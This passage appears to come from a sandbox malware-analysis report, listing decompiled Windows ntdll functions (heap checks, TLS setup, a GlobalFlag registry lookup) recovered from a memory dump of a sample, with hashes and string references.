LdrpCompleteMapModule, xrefs: 341DA39D
Could not validate the crypto signature for DLL %wZ, xrefs: 341DA396

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 427d564d6b7a10d1fa01f15297662d3c9ff9712f998867276d51e6aa18db318a
Instruction ID: b2bcaef9af7059f2d9daccb7aea3e190c41ee872e178927f113fecba7810e528
Opcode Fuzzy Hash: 427d564d6b7a10d1fa01f15297662d3c9ff9712f998867276d51e6aa18db318a
Instruction Fuzzy Hash: A551F1B8A00F45DFF751CA58C9C4B9A77E5EB02794F1601D8E8529B6E1DB74E880CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3421D62C Relevance: 3.9, Strings: 3, Instructions: 163
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E3421D62C(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed int _t52;
				intOrPtr _t53;
				signed int _t63;
				signed short _t64;
				intOrPtr _t67;
				signed short _t71;
				signed int _t74;
				signed short _t75;
				signed short _t77;
				void* _t81;
				signed int _t82;
				signed int _t83;
				signed char _t92;
				unsigned int _t97;
				unsigned int _t102;
				signed int _t106;
				void* _t108;
				void* _t109;
				unsigned int _t112;

				_t82 = __ecx;
				_push(__ecx);
				_t112 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t71 =  *__edx;
							if(( *(__ecx + 0x4c) & _t71) != 0) {
								_t71 = _t71 ^  *(__ecx + 0x50);
							}
							_t44 = _t71 & 0x0000ffff;
						}
					} else {
						_t102 = __edx >> 0x00000003 ^  *__edx ^  *0x34266964 ^ __ecx;
						if(_t102 == 0) {
							_t74 =  *((intOrPtr*)(__edx - (_t102 >> 0xd)));
						} else {
							_t74 = 0;
						}
						_t44 =  *((intOrPtr*)(_t74 + 0x14));
					}
					_t92 =  *((intOrPtr*)(_t112 + 7));
					_t106 = _t44 & 0xffff;
					if(_t92 != 5) {
						if((_t92 & 0x00000040) == 0) {
							if((_t92 & 0x0000003f) == 0x3f) {
								if(_t92 >= 0) {
									if( *(_t82 + 0x4c) == 0) {
										_t48 =  *_t112 & 0x0000ffff;
									} else {
										_t64 =  *_t112;
										if(( *(_t82 + 0x4c) & _t64) != 0) {
											_t64 = _t64 ^  *(_t82 + 0x50);
										}
										_t48 = _t64 & 0x0000ffff;
									}
								} else {
									_t97 = _t112 >> 0x00000003 ^  *_t112 ^  *0x34266964 ^ _t82;
									if(_t97 == 0) {
										_t67 =  *((intOrPtr*)(_t112 - (_t97 >> 0xd)));
									} else {
										_t67 = 0;
									}
									_t48 =  *((intOrPtr*)(_t67 + 0x14));
								}
								_t83 =  *(_t112 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t83 = _t92 & 0x3f;
							}
						} else {
							_t83 =  *(_t112 + 4 + (_t92 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t83 =  *(_t82 + 0x54) & 0x0000ffff ^  *(_t112 + 4) & 0x0000ffff;
					}
					_t108 = (_t106 << 3) - _t83;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t75 =  *__edx & 0x0000ffff;
					} else {
						_t77 =  *__edx;
						if(( *(__ecx + 0x4c) & _t77) != 0) {
							_t77 = _t77 ^  *(__ecx + 0x50);
						}
						_t75 = _t77 & 0x0000ffff;
					}
					_t108 =  *((intOrPtr*)(_t112 - 8)) - (_t75 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t112 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t63 = _t51 & 0x3f;
					goto L38;
				} else {
					_t63 =  *(_t112 + 6) & 0x000000ff;
					L38:
					_t52 = _t63 << 3;
					L42:
					_t109 = _t108 + _t52;
					_t35 = _t112 + 8; // -16
					_t81 = _t35 + _t109;
					_t53 = E341C8050(_t81, 0x341472b8, 8);
					_v8 = _t53;
					if(_t53 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						L3416B910();
					} else {
						L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t109);
					_push(_v8 + _t81);
					L3416B910("Heap block at %p modified at %p past requested size of %Ix\n", _t112);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x342647a1 = 1;
						asm("int3");
						 *0x342647a1 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}

0x3421d62c
0x3421d631
0x3421d634
0x3421d637
0x3421d63c
0x3421d7de
0x3421d7de
0x3421d7e0
0x3421d7e4
0x3421d7e4
0x3421d644
0x3421d66d
0x3421d698
0x3421d6a9
0x3421d69a
0x3421d69a
0x3421d69f
0x3421d6a1
0x3421d6a1
0x3421d6a4
0x3421d6a4
0x3421d66f
0x3421d67a
0x3421d67f
0x3421d68c
0x3421d681
0x3421d681
0x3421d681
0x3421d68e
0x3421d68e
0x3421d6ac
0x3421d6b2
0x3421d6b8
0x3421d6c9
0x3421d6de
0x3421d6ea
0x3421d717
0x3421d728
0x3421d719
0x3421d719
0x3421d71e
0x3421d720
0x3421d720
0x3421d723
0x3421d723
0x3421d6ec
0x3421d6f9
0x3421d6fe
0x3421d70b
0x3421d700
0x3421d700
0x3421d700
0x3421d70d
0x3421d70d
0x3421d731
0x3421d6e0
0x3421d6e3
0x3421d6e3
0x3421d6cb
0x3421d6d1
0x3421d6d1
0x3421d6ba
0x3421d6c2
0x3421d6c2
0x3421d738
0x3421d646
0x3421d64a
0x3421d65b
0x3421d64c
0x3421d64c
0x3421d651
0x3421d653
0x3421d653
0x3421d656
0x3421d656
0x3421d664
0x3421d664
0x3421d73a
0x3421d73f
0x3421d74c
0x3421d756
0x00000000
0x3421d756
0x3421d751
0x00000000
0x3421d741
0x3421d741
0x3421d745
0x3421d745
0x3421d758
0x3421d75a
0x3421d75c
0x3421d764
0x3421d767
0x3421d76c
0x3421d772
0x00000000
0x00000000
0x3421d77f
0x3421d79f
0x3421d7a4
0x3421d781
0x3421d797
0x3421d79c
0x3421d7ad
0x3421d7b0
0x3421d7b7
0x3421d7c9
0x3421d7cb
0x3421d7d2
0x3421d7d3
0x3421d7d3
0x3421d7da
0x00000000
0x3421d7da

Strings

HEAP[%wZ]: , xrefs: 3421D792
HEAP: , xrefs: 3421D79F
Heap block at %p modified at %p past requested size of %Ix, xrefs: 3421D7B2

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
API String ID: 0-3815128232
Opcode ID: 7422595aa4b91d51c5ee80b4e90af88af73ab52e7205c893401c99f0be276ee7
Instruction ID: d21974643c6798006ea226097c133fa2bba1bf6d103f72f5caae8f9cf598af36
Opcode Fuzzy Hash: 7422595aa4b91d51c5ee80b4e90af88af73ab52e7205c893401c99f0be276ee7
Instruction Fuzzy Hash: 7D510479230791CFF350CE29C88477277E6DB45284F50889EE4C6AB685DA3AF847DB60

Uniqueness

Uniqueness Score: -1.00%

Function 3416753F Relevance: 3.9, Strings: 3, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E3416753F(signed int __ecx, signed int __edx, intOrPtr _a4) {
				unsigned int _v12;
				signed char _t46;
				signed char _t50;
				intOrPtr* _t52;
				unsigned int _t53;
				signed char _t54;
				signed int _t57;
				signed int _t60;
				intOrPtr _t64;
				intOrPtr* _t66;
				signed int _t67;
				unsigned int _t78;
				signed int _t80;

				_t60 = __edx;
				_t80 = __ecx;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						L3416B910();
					} else {
						L3416B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t60 + 8);
					_push(_t80);
					L3416B910("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x342647a1 = 1;
						asm("int3");
						 *0x342647a1 = 0;
					}
					return 0;
				} else {
					_t46 =  *((intOrPtr*)(__edx + 7));
					if((_t46 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t46 < 0) {
						if( *((char*)(__ecx + 0xea)) != 2) {
							_t64 = 0;
						} else {
							_t64 =  *((intOrPtr*)(__ecx + 0xe4));
						}
						if(_t64 != 0) {
							if(_t46 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *((intOrPtr*)(__ecx + 0x4c)) == 0) {
						L6:
						if( *((char*)(_t60 + 7)) == 4) {
							if((_t60 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t80 + 0x4c) == 0) {
								_t50 =  *((intOrPtr*)(_t60 + 2));
							} else {
								_t53 =  *_t60;
								if(( *(_t80 + 0x4c) & _t53) != 0) {
									_t53 = _t53 ^  *(_t80 + 0x50);
								}
								_t50 = _t53 >> 0x10;
							}
							if((_t50 & 0x00000004) != 0) {
								if(E3421D62C(_t80, _t60) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t60 + 7)) == 4) {
									goto L23;
								}
								_t66 = _t80 + 0xa4;
								_t52 =  *_t66;
								while(_t52 != _t66) {
									if(_t60 <  *((intOrPtr*)(_t52 + 0x14)) || _t60 >=  *((intOrPtr*)(_t52 + 0x18))) {
										_t52 =  *_t52;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t54 =  *((intOrPtr*)(_t60 + 6));
						if(_t54 == 0) {
							_t67 = _t80;
						} else {
							_t67 = (_t60 & 0xffff0000) - ((_t54 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t67 == 0 ||  *((intOrPtr*)(_t67 + 0x18)) != _t80 || _t60 <  *((intOrPtr*)(_t67 + 0x24)) || _t60 >=  *((intOrPtr*)(_t67 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					}
					_t57 =  *__edx;
					_t78 =  *(__ecx + 0x50) ^ _t57;
					_v12 = _t57;
					_v12 = _t78;
					if(_t78 >> 0x18 != (_t78 >> 0x00000010 ^ _t78 >> 0x00000008 ^ _t78)) {
						goto L37;
					}
					goto L6;
				}
			}

0x34167548
0x3416754b
0x3416754f
0x341cad1e
0x341cad28
0x341cad47
0x341cad4c
0x341cad2a
0x341cad3f
0x341cad44
0x341cad55
0x341cad56
0x341cad5f
0x341cad71
0x341cad73
0x341cad7a
0x341cad7b
0x341cad7b
0x00000000
0x3416755e
0x3416755e
0x34167563
0x00000000
0x00000000
0x3416756b
0x34167639
0x34167659
0x3416763b
0x3416763b
0x3416763b
0x34167643
0x3416764b
0x34167626
0x00000000
0x34167626
0x3416764d
0x00000000
0x34167643
0x34167575
0x3416759d
0x341675a1
0x341cad06
0x00000000
0x00000000
0x341675eb
0x341675ef
0x3416765d
0x341675f1
0x341675f1
0x341675f6
0x341675f8
0x341675f8
0x341675fb
0x341675fb
0x34167600
0x341cad18
0x00000000
0x00000000
0x34167606
0x34167606
0x3416760a
0x00000000
0x00000000
0x3416760c
0x34167612
0x34167614
0x3416761f
0x3416762e
0x00000000
0x00000000
0x00000000
0x00000000
0x3416761f
0x34167614
0x00000000
0x34167600
0x341675a7
0x341675ac
0x34167652
0x341675b2
0x341675c2
0x341675c2
0x341675ca
0x00000000
0x00000000
0x00000000
0x00000000
0x341675ca
0x34167577
0x3416757c
0x3416757e
0x34167583
0x34167597
0x00000000
0x00000000
0x00000000
0x34167597

Strings

HEAP[%wZ]: , xrefs: 341CAD3A
HEAP: , xrefs: 341CAD47
Invalid address specified to %s( %p, %p ), xrefs: 341CAD5A

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 0b48a118dee8b7d97e6cdc2e872fa22f0436694ff9a3d0657b2cd728a3fe00e2
Instruction ID: 80f0d35a351da09190a14e5c742e90cc1af14cc8db1a949636dba45f5e1307c6
Opcode Fuzzy Hash: 0b48a118dee8b7d97e6cdc2e872fa22f0436694ff9a3d0657b2cd728a3fe00e2
Instruction Fuzzy Hash: 90415679200F408FFB16CE18C8C0BB577A2DF01399F6484EDD9978B656CBA8E855CB21

Uniqueness

Uniqueness Score: -1.00%

Function 341A15EF Relevance: 3.9, Strings: 3, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E341A15EF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t59;
				intOrPtr _t62;
				signed int _t83;
				intOrPtr _t87;
				intOrPtr _t95;
				intOrPtr* _t98;
				signed int _t99;
				intOrPtr _t102;
				void* _t104;
				void* _t106;

				_push(0x38);
				_push(0x3424c6d0);
				L341C7BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t104 - 0x2c)) =  *[fs:0x18];
				 *((intOrPtr*)(_t104 - 0x24)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				 *((intOrPtr*)(_t104 - 0x1c)) = 0;
				L341753C0(0x34266718);
				_t83 =  *0x34265c90; // 0x11
				 *(_t104 - 0x48) = _t83;
				if(_t83 == 0) {
					_t102 =  *((intOrPtr*)(_t104 - 0x2c)) + 0x2c;
					L9:
					 *((intOrPtr*)( *((intOrPtr*)(_t104 - 0x2c)) + 0x2c)) = _t102;
					asm("lock inc dword [0x34265c80]");
					E341752F0(_t83, 0x34266718);
					_t59 = 0;
					L10:
					 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0x10));
					return _t59;
				}
				_t102 = E341A174A(_t83);
				 *((intOrPtr*)(_t104 - 0x40)) = _t102;
				if(_t102 == 0) {
					E341752F0(_t83, 0x34266718);
					_t59 = 0xc0000017;
					goto L10;
				}
				 *((intOrPtr*)(_t104 - 0x30)) = 0x342633a8;
				_t62 =  *0x342633a8; // 0x3f22fd8
				 *((intOrPtr*)(_t104 - 0x20)) = _t62;
				while(1) {
					_t98 =  *((intOrPtr*)(_t104 - 0x20));
					if(_t98 ==  *((intOrPtr*)(_t104 - 0x30))) {
						goto L9;
					}
					 *((intOrPtr*)(_t104 - 0x44)) = _t98;
					 *((intOrPtr*)(_t104 - 0x20)) =  *_t98;
					 *((intOrPtr*)(_t104 - 0x28)) = E341A1715(_t98, _t104 - 0x34);
					_t87 =  *0x34265d78; // 0x0
					_t88 = _t87 + 0xc0000;
					 *(_t104 - 0x38) =  *(_t104 - 0x34);
					_t95 = E34185D90(_t87 + 0xc0000,  *((intOrPtr*)(_t104 - 0x24)), _t87 + 0xc0000, _t65 +  *(_t104 - 0x34) + 1);
					if(_t95 == 0) {
						 *((intOrPtr*)(_t104 - 0x1c)) = 0xc0000017;
						L13:
						E341752F0(_t88, 0x34266718);
						_t99 = 0;
						do {
							_t69 =  *((intOrPtr*)(_t102 + _t99 * 4));
							if( *((intOrPtr*)(_t102 + _t99 * 4)) != 0) {
								L34183BC0( *((intOrPtr*)(_t104 - 0x24)), 0,  *((intOrPtr*)(_t69 - 4)));
							}
							_t99 = _t99 + 1;
						} while (_t99 <  *(_t104 - 0x48));
						_t42 = _t102 - 8; // -8
						L34183BC0( *((intOrPtr*)(_t104 - 0x24)), 0, _t42);
						_t59 =  *((intOrPtr*)(_t104 - 0x1c));
						goto L10;
					}
					_t88 =  *(_t104 - 0x38) + 0x00000001 + _t95 &  !( *(_t104 - 0x38));
					 *((intOrPtr*)(_t88 - 4)) = _t95;
					_t21 = _t98 + 0x24; // 0x77aa33c8
					 *(_t102 +  *_t21 * 4) = _t88;
					 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
					_t27 = _t98 + 8; // 0x18
					L341B88C0(_t88,  *_t27,  *((intOrPtr*)(_t104 - 0x28)));
					_t106 = _t106 + 0xc;
					 *(_t104 - 4) = 0xfffffffe;
					if( *((intOrPtr*)(_t104 - 0x1c)) < 0) {
						goto L13;
					}
					if(( *0x342637c0 & 0x00000005) != 0) {
						_t45 = _t98 + 0x24; // 0x77aa33c8
						_t83 =  *_t45;
						_push( *((intOrPtr*)(_t102 + _t83 * 4)));
						_t48 = _t98 + 8; // 0x18
						_push( *_t48);
						_t49 = _t98 + 0xc; // 0x0
						_t50 = _t98 + 8; // 0x18
						_push( *_t49 -  *_t50);
						_push(_t83);
						E341EE692("minkernel\\ntdll\\ldrtls.c", 0x369, "LdrpAllocateTls", 2, "TlsVector %p Index %d : %d bytes copied from %p to %p\n", _t102);
						_t106 = _t106 + 0x28;
					}
				}
				goto L9;
			}

0x341a15ef
0x341a15f1
0x341a15f6
0x341a1601
0x341a160d
0x341a1612
0x341a161b
0x341a1620
0x341a1626
0x341a162b
0x341a16ed
0x341a16f0
0x341a16f3
0x341a16f6
0x341a16fe
0x341a1703
0x341a1705
0x341a1708
0x341a1714
0x341a1714
0x341a1636
0x341a1638
0x341a163d
0x341e18ae
0x341e18b3
0x00000000
0x341e18b3
0x341a1643
0x341a164a
0x341a164f
0x341a1652
0x341a1652
0x341a1658
0x00000000
0x00000000
0x341a165e
0x341a1665
0x341a1672
0x341a1675
0x341a167b
0x341a1684
0x341a1694
0x341a1698
0x341e18bd
0x341e18c4
0x341e18c5
0x341e18ca
0x341e18cc
0x341e18cc
0x341e18d1
0x341e18db
0x341e18db
0x341e18e0
0x341e18e1
0x341e18e6
0x341e18ef
0x341e18f4
0x00000000
0x341e18f4
0x341a16a8
0x341a16aa
0x341a16ad
0x341a16b0
0x341a16b3
0x341a16ba
0x341a16be
0x341a16c3
0x341a16c6
0x341a16d2
0x00000000
0x00000000
0x341a16df
0x341e1931
0x341e1931
0x341e1934
0x341e1937
0x341e1937
0x341e193a
0x341e193d
0x341e1940
0x341e1941
0x341e1959
0x341e195e
0x341e195e
0x341a16df
0x00000000

Strings

LdrpAllocateTls, xrefs: 341E194A
TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 341E1943
minkernel\ntdll\ldrtls.c, xrefs: 341E1954

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
API String ID: 0-4274184382
Opcode ID: f4f25668412194f29054a63e0dbf46dd4fc06d995a60f3785bd72a4a9304013c
Instruction ID: b1e7c4f3c0e366ad8de2a7dbfe1ab2706ac89b10054d266e6474ef881ff224a5
Opcode Fuzzy Hash: f4f25668412194f29054a63e0dbf46dd4fc06d995a60f3785bd72a4a9304013c
Instruction Fuzzy Hash: 4F414AB9A00A05EFEB55CFA9C881BADBBF6FF48310F048159E405B7251DB75A841CF94

Uniqueness

Uniqueness Score: -1.00%

Function 341FB214 Relevance: 3.9, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E341FB214(void* __ecx) {
				char _v8;
				char _v12;
				short _v14;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				char _v40;
				char _v44;
				intOrPtr _v576;
				char _v580;
				intOrPtr _t44;
				intOrPtr _t46;
				intOrPtr* _t61;
				void* _t64;
				short _t65;
				void* _t66;
				intOrPtr* _t67;

				_t66 = __ecx;
				_v8 = 0;
				E341B8F40( &_v580, 0, 0x214);
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_push(0);
				_push(0x210);
				_push( &_v580);
				_push(0x2b);
				_push(_t66);
				if((L341B2B20() & 0xc0000000) == 0xc0000000) {
					L9:
					if(_v8 != 0) {
						_push(_v8);
						E341B2A80();
						_v8 = 0;
					}
					_t38 = _v12;
					if(_v12 != 0) {
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t38);
					}
					return _v20;
				}
				_t67 = E341FB39F(_v576);
				if(_t67 == 0) {
					goto L9;
				} else {
					_t61 = _t67;
					_t8 = _t61 + 2; // 0x2
					_t64 = _t8;
					goto L3;
					L3:
					_t44 =  *_t61;
					_t61 = _t61 + 2;
					if(_t44 != 0) {
						goto L3;
					} else {
						_t63 = _t61 - _t64 >> 1;
						_t65 = 0xc2 + (_t61 - _t64 >> 1) * 2;
						_t46 = E34185D90(_t61 - _t64 >> 1,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
						_v12 = _t46;
						if(_t46 != 0) {
							_v14 = _t65;
							if(E3417FE40(_t63,  &_v16, L"\\Registry\\Machine\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\") >= 0 && E3417FE40(_t63,  &_v16, _t67) >= 0) {
								_v44 = 0x18;
								_v36 =  &_v16;
								_push( &_v44);
								_push("true");
								_v40 = 0;
								_push( &_v8);
								_v32 = 0x40;
								_v28 = 0;
								_v24 = 0;
								if(L341B2AB0() >= 0) {
									E34166CC0(_v8, L"GlobalFlag", 4,  &_v20, 4, 0);
								}
							}
						}
						goto L9;
					}
				}
			}

0x341fb231
0x341fb233
0x341fb236
0x341fb23e
0x341fb247
0x341fb24a
0x341fb24d
0x341fb24e
0x341fb253
0x341fb254
0x341fb256
0x341fb265
0x341fb31c
0x341fb31f
0x341fb321
0x341fb324
0x341fb329
0x341fb329
0x341fb32c
0x341fb331
0x341fb33e
0x341fb33e
0x341fb34a
0x341fb34a
0x341fb276
0x341fb27a
0x00000000
0x341fb280
0x341fb280
0x341fb282
0x341fb282
0x341fb282
0x341fb285
0x341fb285
0x341fb288
0x341fb28e
0x00000000
0x341fb290
0x341fb298
0x341fb29a
0x341fb2a6
0x341fb2ab
0x341fb2b0
0x341fb2ba
0x341fb2c6
0x341fb2d9
0x341fb2e0
0x341fb2e6
0x341fb2e7
0x341fb2ec
0x341fb2ef
0x341fb2f0
0x341fb2f7
0x341fb2fa
0x341fb304
0x341fb317
0x341fb317
0x341fb304
0x341fb2c6
0x00000000
0x341fb2b0
0x341fb28e

Strings

GlobalFlag, xrefs: 341FB30F
@, xrefs: 341FB2F0
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 341FB2B2

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: 04e88b0cff8ac32cb47ee818aebf7bf3d336ccad86b2e7b0a04cc73f50ef16b9
Instruction ID: e938dd89e3ce8c62b5c675a186beeac09c48a590b2525d8f1a03c1584d3b554d
Opcode Fuzzy Hash: 04e88b0cff8ac32cb47ee818aebf7bf3d336ccad86b2e7b0a04cc73f50ef16b9
Instruction Fuzzy Hash: 72316DB1E40609AFEB10DFA4CDC0AEFBBBDEF44744F5005A9E605A7150D7759A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 341A1527 Relevance: 3.8, Strings: 3, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E341A1527(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr _t19;
				signed int _t25;
				signed int _t28;
				intOrPtr _t35;
				signed int _t39;
				signed int _t41;
				signed int _t43;
				void* _t45;
				signed int _t51;

				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(_t28);
				_t43 =  *0x34265d8c; // 0x3f22cc8
				_push(_t39);
				if(_t43 == 0x34265d8c) {
					L5:
					 *0x34265c90 =  *0x34265c90 & 0x00000000;
					 *0x34265c94 =  *0x34265c94 & 0x00000000;
					_t51 =  *0x34265c94;
					L6:
					_t17 = E341A15EF(_t28, _t39, _t43, _t51);
					L7:
					return _t17;
				}
				_t28 = 1;
				do {
					_t39 = _t43;
					_t43 =  *_t43;
					_t4 = _t39 + 0x18; // 0x400000
					_t19 = E3417DE20(_t32, 1,  *_t4, _t28, 9,  &_v12);
					_v12 = _t19;
					if(_t19 != 0) {
						__eflags =  *0x342637c0 & 0x00000005;
						if(__eflags != 0) {
							_push(_t19);
							_t12 = _t39 + 0x24; // 0x3f22cec
							E341EE692("minkernel\\ntdll\\ldrtls.c", 0x241, "LdrpInitializeTls", 2, "DLL \"%wZ\" has TLS information at %p\n", _t12);
							_t19 = _v12;
							_t45 = _t45 + 0x1c;
						}
						_push(0);
						_push(0);
						_push( &_v8);
						_t32 = _t19;
						_t17 = E341A1796(_t28, _t19, _t39, _t39, _t43, __eflags);
						__eflags = _t17;
						if(__eflags < 0) {
							goto L7;
						}
						 *((short*)(_t39 + 0x3a)) = 0xffff;
					}
				} while (_t43 != 0x34265d8c);
				_t43 = _v8;
				if(_t43 != 0) {
					_t11 = _t43 + 8; // 0x8
					_t41 = _t11;
					__eflags = _t41 - 0x20;
					if(_t41 > 0x20) {
						_t35 =  *0x34265d78; // 0x0
						_t14 = _t43 + 0x27; // 0x27
						_t28 = _t14 >> 5;
						_t25 = E34185D90(_t35 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, _t28 << 2);
						__eflags = _t25;
						if(_t25 != 0) {
							_t43 = _v8;
							L13:
							 *0x34265c90 = _t41;
							_t39 = 0x34265c90;
							 *0x34265c98 = _t28;
							 *0x34265c94 = _t25;
							L341A1AD0(0x34265c90, 0, _t43);
							L341A1B10(0x34265c90, _t43, 8);
							goto L6;
						}
						_t17 = 0xc0000017;
						goto L7;
					}
					_t25 = 0x34265c88;
					goto L13;
				}
				goto L5;
			}

0x341a1527
0x341a152c
0x341a152d
0x341a152e
0x341a1532
0x341a1534
0x341a153a
0x341a1541
0x341a156f
0x341a156f
0x341a1576
0x341a1576
0x341a157d
0x341a157d
0x341a1582
0x341a1586
0x341a1586
0x341a1545
0x341a1546
0x341a1549
0x341a154b
0x341a1551
0x341a1554
0x341a1559
0x341a155e
0x341a1587
0x341a158e
0x341e1845
0x341e1846
0x341e1860
0x341e1865
0x341e1868
0x341e1868
0x341a1594
0x341a1596
0x341a159d
0x341a159e
0x341a15a0
0x341a15a5
0x341a15a7
0x00000000
0x00000000
0x341a15ae
0x341a15ae
0x341a1560
0x341a1568
0x341a156d
0x341a15b4
0x341a15b4
0x341a15b7
0x341a15ba
0x341e1870
0x341e1876
0x341e1879
0x341e1892
0x341e1897
0x341e1899
0x341e18a5
0x341a15c5
0x341a15c6
0x341a15cc
0x341a15d4
0x341a15da
0x341a15df
0x341a15e8
0x00000000
0x341a15e8
0x341e189b
0x00000000
0x341e189b
0x341a15c0
0x00000000
0x341a15c0
0x00000000

Strings

DLL "%wZ" has TLS information at %p, xrefs: 341E184A
minkernel\ntdll\ldrtls.c, xrefs: 341E185B
LdrpInitializeTls, xrefs: 341E1851

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
